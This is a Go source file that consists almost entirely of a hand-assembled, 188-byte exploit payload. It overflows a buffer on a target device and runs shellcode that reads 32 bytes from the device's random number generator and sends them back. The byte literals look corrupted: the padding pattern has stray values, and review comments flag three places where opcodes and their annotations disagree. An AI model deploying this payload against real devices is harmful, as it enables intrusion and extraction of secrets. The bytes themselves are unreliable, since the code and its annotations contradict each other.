package main
// nipperpeekrand is a raw, hand-assembled exploit payload (188 bytes) that is
// sent verbatim to the target; the author's note says it returns 32 bytes from
// the RNG. Nothing in this file validates the blob: there is no length check
// and no assembler source, so the byte literals below are the only authority
// on what is transmitted, and the mnemonic comments are the author's annotation
// of them. In three places the annotation and the literal disagree (marked
// NOTE(review) below); treat the bytes, not the comments, as what is sent.
//
// This exploit returns 32 bytes from the RNG.
var nipperpeekrand = []byte{
/* Much of this is padding before the overflow. We could put
shellcode here, and the Headend exploit does, but we'll need
to clobber that buffer in sending our response.
*/
0x01, 0x02, 0x03, 0xa4, 0x05, 0x06, 0x07, 0x08,
0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
0x11, 0x02, 0x03, 0x04, 0x0a, 0x06, 0x07, 0x08,
0x59, 0x5A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
0xc1, 0x02, 0x03, 0xd4, 0x05, 0x06, 0x07, 0xc8,
0x29, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
0x31, 0xd2, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
0x39, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
0x41, 0x02, 0x03, 0xd4, 0x05, 0x06, 0x07, 0x08,
0x49, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
0x51, 0x02, 0x03, 0x04, 0x05, 0x06, 0xe7, 0x08,
0x59, 0x0A, 0x0a, 0x0C, 0x0a, 0x0E, 0x0F, 0x10,
0x61, 0x02, 0x03, 0x04, 0x00, 0x01, 0x02, 0x03,
0x04, 0x05, 0x0b, 0x07, 0x08, 0x09, 0x0A, 0x0B,
0x0C, 0x0D, 0x0E, 0x0F, 0x00, 0xf1, 0x02, 0x03,
0x04, 0x05, 0xe6, 0x07, 0x08, 0x09, 0x0A, 0x0B,
0x0C, 0xfD, 0x0c, 0x0F,
// The addresses in the comments from here on (0x220, 0x19C, 0x01A1, ...) are
// target-memory addresses as annotated by the author, not offsets into this
// slice; the padding above is 124 bytes, so they do not line up with slice
// indices — do not use them to index nipperpeekrand.
//Early global variables at 0x220.
0x00, 0x01, 0x02, 0x03,
0x05, 0x0A, 0x06, 0x07,
0x08, 0x09, 0x0A, 0x0B,
0x0C, 0x0D, 0x0E, 0x0F,
// Flags
0x01, 0x01,
// 32: skip two bytes.
0x01, 0x00,
// NAD, PCB, LEN
0x00, 0x00, 0xFF,
// Six filler bytes.
0x07, 0x52, 0x56, 0x73, 0x03, 0xCD,
//3d: DC is total message length, C3 is the offset.
0xDC, 0x34, 0xC3,
//This is the entry point for our shellcode.
0x9d, //NOP
//Data begins at 0x19C+2.
// NOTE(review): the literal is 0x21 but the annotation says 0x20 — one of the
// two is stale; confirm which is intended before relying on the comment.
0xAE, 0x21, //LD X, 0x20 ; Length field.
//loop:
0xB6, 0x06, //LD A, (target+1,X) //Load the high byte.
0xD7, 0x01, 0xA1, //STA (0x01A1+1,X) //Store the byte to the data buffer.
0x5A, //DEC X
0xB6, 0x07, //LD A, (target+1,X) //Load the low byte.
0xD7, 0x01, 0xA1, //STA (0x01A1+1,X) //Store the byte to the data buffer.
0x5A, //DEC X
// NOTE(review): the branch displacement literal is 0xF1 while the trailing
// annotation reads "F6"; the literal is what is sent — confirm the comment.
0x2A, 0xF1, //JRPL loop ; F6
//Sends some data from the IO buffer.
0xa6, 0x93, //LDA #$93, response code
// NOTE(review): the literal is 0x40 but the annotation says #$17; the two
// lengths disagree, so the comment's "length in data bytes" cannot be trusted
// as written — confirm against the actual response length observed.
0xae, 0x40, //LDX #$17, length in data bytes
0xCD, 0x75, 0x7F, //JMP RESPONDAX to send the response.
0x9d,
//These three bytes will be clobbered. Don't rely on them.
0x00, 0x00, 0x00,
//These bytes set the entry point of 0x0060
0x00, 0x00, 0x00, 0x60,
}